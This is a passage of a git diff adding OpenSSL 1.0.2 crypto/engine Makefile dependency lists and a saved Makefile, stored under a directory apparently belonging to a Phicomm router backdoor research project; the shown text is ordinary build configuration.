+eng_table.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_table.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_table.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_table.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+eng_table.o: eng_table.c
+tb_asnmth.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_asnmth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_asnmth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_asnmth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_asnmth.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_asnmth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_asnmth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_asnmth.o: ../../include/openssl/objects.h
+tb_asnmth.o: ../../include/openssl/opensslconf.h
+tb_asnmth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_asnmth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_asnmth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_asnmth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_asnmth.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+tb_asnmth.o: eng_int.h tb_asnmth.c
+tb_cipher.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_cipher.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_cipher.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_cipher.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_cipher.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_cipher.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_cipher.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_cipher.o: ../../include/openssl/objects.h
+tb_cipher.o: ../../include/openssl/opensslconf.h
+tb_cipher.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_cipher.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_cipher.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_cipher.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_cipher.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_cipher.o: tb_cipher.c
+tb_dh.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_dh.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_dh.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_dh.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_dh.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_dh.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_dh.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_dh.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_dh.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_dh.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_dh.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_dh.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_dh.o: ../cryptlib.h eng_int.h tb_dh.c
+tb_digest.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_digest.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_digest.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_digest.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_digest.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_digest.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_digest.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_digest.o: ../../include/openssl/objects.h
+tb_digest.o: ../../include/openssl/opensslconf.h
+tb_digest.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_digest.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_digest.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_digest.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_digest.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_digest.o: tb_digest.c
+tb_dsa.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_dsa.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_dsa.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_dsa.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_dsa.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_dsa.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_dsa.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_dsa.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_dsa.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_dsa.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_dsa.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_dsa.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_dsa.o: ../cryptlib.h eng_int.h tb_dsa.c
+tb_ecdh.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_ecdh.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_ecdh.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_ecdh.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_ecdh.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_ecdh.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_ecdh.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_ecdh.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_ecdh.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_ecdh.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_ecdh.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_ecdh.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_ecdh.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_ecdh.c
+tb_ecdsa.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_ecdsa.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_ecdsa.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_ecdsa.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_ecdsa.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_ecdsa.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_ecdsa.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_ecdsa.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_ecdsa.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_ecdsa.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_ecdsa.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_ecdsa.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_ecdsa.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_ecdsa.c
+tb_pkmeth.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_pkmeth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_pkmeth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_pkmeth.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_pkmeth.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_pkmeth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_pkmeth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_pkmeth.o: ../../include/openssl/objects.h
+tb_pkmeth.o: ../../include/openssl/opensslconf.h
+tb_pkmeth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_pkmeth.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_pkmeth.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_pkmeth.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_pkmeth.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h
+tb_pkmeth.o: tb_pkmeth.c
+tb_rand.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_rand.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_rand.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_rand.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_rand.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_rand.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_rand.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_rand.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_rand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_rand.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_rand.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_rand.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_rand.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_rand.c
+tb_rsa.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+tb_rsa.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+tb_rsa.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+tb_rsa.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+tb_rsa.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+tb_rsa.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+tb_rsa.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+tb_rsa.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+tb_rsa.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+tb_rsa.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+tb_rsa.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+tb_rsa.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+tb_rsa.o: ../cryptlib.h eng_int.h tb_rsa.c
+tb_store.o: ../../e_os.h ../../include/openssl/asn1.h
+tb_store.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+tb_store.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tb_store.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+tb_store.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+tb_store.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tb_store.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tb_store.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tb_store.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tb_store.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tb_store.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tb_store.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tb_store.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h tb_store.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile.save
new file mode 100644
index 0000000..2ee6c72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/engine/Makefile.save
@@ -0,0 +1,433 @@
+#
+# OpenSSL/crypto/engine/Makefile
+#
+
+DIR=	engine
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST= enginetest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= eng_err.c eng_lib.c eng_list.c eng_init.c eng_ctrl.c \
+	eng_table.c eng_pkey.c eng_fat.c eng_all.c \
+	tb_rsa.c tb_dsa.c tb_ecdsa.c tb_dh.c tb_ecdh.c tb_rand.c tb_store.c \
+	tb_cipher.c tb_digest.c tb_pkmeth.c tb_asnmth.c \
+	eng_openssl.c eng_cnf.c eng_dyn.c eng_cryptodev.c \
+	eng_rdrand.c
+LIBOBJ= eng_err.o eng_lib.o eng_list.o eng_init.o eng_ctrl.o \
+	eng_table.o eng_pkey.o eng_fat.o eng_all.o \
+	tb_rsa.o tb_dsa.o tb_ecdsa.o tb_dh.o tb_ecdh.o tb_rand.o tb_store.o \
+	tb_cipher.o tb_digest.o tb_pkmeth.o tb_asnmth.o \
+	eng_openssl.o eng_cnf.o eng_dyn.o eng_cryptodev.o \
+	eng_rdrand.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= engine.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+eng_all.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_all.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_all.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_all.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_all.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_all.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_all.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_all.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_all.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_all.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_all.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_all.c eng_int.h
+eng_cnf.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_cnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_cnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+eng_cnf.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_cnf.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_cnf.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_cnf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_cnf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_cnf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_cnf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_cnf.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_cnf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_cnf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_cnf.o: ../cryptlib.h eng_cnf.c eng_int.h
+eng_cryptodev.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_cryptodev.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+eng_cryptodev.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_cryptodev.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_cryptodev.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_cryptodev.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_cryptodev.o: ../../include/openssl/obj_mac.h
+eng_cryptodev.o: ../../include/openssl/objects.h
+eng_cryptodev.o: ../../include/openssl/opensslconf.h
+eng_cryptodev.o: ../../include/openssl/opensslv.h
+eng_cryptodev.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_cryptodev.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_cryptodev.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_cryptodev.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_cryptodev.o: eng_cryptodev.c
+eng_ctrl.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_ctrl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_ctrl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_ctrl.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_ctrl.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_ctrl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_ctrl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_ctrl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_ctrl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_ctrl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_ctrl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_ctrl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_ctrl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_ctrl.c eng_int.h
+eng_dyn.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_dyn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_dyn.o: ../../include/openssl/crypto.h ../../include/openssl/dso.h
+eng_dyn.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_dyn.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_dyn.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_dyn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_dyn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_dyn.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_dyn.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_dyn.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_dyn.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_dyn.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_dyn.o: ../cryptlib.h eng_dyn.c eng_int.h
+eng_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eng_err.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_err.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_err.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_err.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_err.o: eng_err.c
+eng_fat.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_fat.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_fat.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+eng_fat.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_fat.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_fat.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_fat.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_fat.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_fat.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+eng_fat.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+eng_fat.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_fat.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_fat.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_fat.o: ../cryptlib.h eng_fat.c eng_int.h
+eng_init.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_init.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_init.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_init.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_init.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_init.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_init.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_init.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_init.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_init.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_init.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_init.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_init.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_init.c eng_int.h
+eng_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_lib.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_lib.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+eng_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_lib.o: ../cryptlib.h eng_int.h eng_lib.c
+eng_list.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_list.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_list.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_list.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_list.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_list.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_list.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_list.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_list.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_list.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_list.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_list.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_list.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h eng_list.c
+eng_openssl.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_openssl.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_openssl.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+eng_openssl.o: ../../include/openssl/dsa.h ../../include/openssl/dso.h
+eng_openssl.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_openssl.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_openssl.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_openssl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_openssl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_openssl.o: ../../include/openssl/opensslconf.h
+eng_openssl.o: ../../include/openssl/opensslv.h
+eng_openssl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+eng_openssl.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+eng_openssl.o: ../../include/openssl/rand.h ../../include/openssl/rc4.h
+eng_openssl.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+eng_openssl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_openssl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_openssl.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_openssl.c
+eng_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_pkey.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_pkey.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+eng_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+eng_pkey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+eng_pkey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+eng_pkey.o: ../../include/openssl/x509_vfy.h ../cryptlib.h eng_int.h eng_pkey.c
+eng_rdrand.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+eng_rdrand.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+eng_rdrand.o: ../../include/openssl/e_os2.h ../../include/openssl/ec.h
+eng_rdrand.o: ../../include/openssl/ecdh.h ../../include/openssl/ecdsa.h
+eng_rdrand.o: ../../include/openssl/engine.h ../../include/openssl/err.h
+eng_rdrand.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+eng_rdrand.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+eng_rdrand.o: ../../include/openssl/opensslconf.h
+eng_rdrand.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_rdrand.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+eng_rdrand.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+eng_rdrand.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+eng_rdrand.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+eng_rdrand.o: eng_rdrand.c
+eng_table.o: ../../e_os.h ../../include/openssl/asn1.h
+eng_table.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+eng_table.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+eng_table.o: ../../include/openssl/ec.h ../../include/openssl/ecdh.h
+eng_table.o: ../../include/openssl/ecdsa.h ../../include/openssl/engine.h
+eng_table.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+eng_table.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+eng_table.o: ../../include/openssl/objects.h
+eng_table.o: ../../include/openssl/opensslconf.h
+eng_table.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+eng_table.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
